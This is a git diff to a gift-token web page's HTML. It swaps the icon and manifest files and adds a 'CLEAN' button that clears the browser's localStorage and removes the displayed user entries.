--- a/adjust.html
+++ b/adjust.html
@@ -4,8 +4,8 @@
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1, user-scalable=0">
   <meta property="og:title" content="Buy and redeem gift tokens, instant withdraw to account">
-  <link href="public/preview.png" rel="icon" type="images/png">
-  <link rel="manifest" href="manifest.json">
+  <link href="image.jpg" rel="icon" type="images/png">
+  <link rel="manifest" href="brainbox.json">
   <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
   <meta property="og:discription" content="Starmart">
   <style>
@@ -148,6 +148,17 @@ section {
 .offline {
 	color: red;
 }
+.clear {
+	text-align: center;
+}
+.clear button {
+	font-size: 14px;
+	background: #fff;
+	color: #0066ff;
+	border: 2px solid #0066ff;
+	padding: 8px 12px;
+	border-radius: 20px;
+}
   </style>
 </head>
 <body>
@@ -219,6 +230,9 @@ section {
 					</div>
 				</div>
 			</div>
+			<div class="clear">
+				<button id="clearBtn">CLEAN</button>
+			</div>
 		</div>
     </section>
   </main>
@@ -248,10 +262,16 @@ section {
           });
         }
 
+		
 		function toclear() {
 			localStorage.removeItem('savedUsers');
-			displaySavedUsers();
+			localStorage.clear();
+			const existingUsers = messageDisplay.querySelectorAll('.user');
+            existingUsers.forEach(user => user.remove());
 		}
+		
+		const clearBtn = document.getElementById('clearBtn');
+		clearBtn.addEventListener('click', toclear);
 
 
         // Function to fetch new messages using long-polling
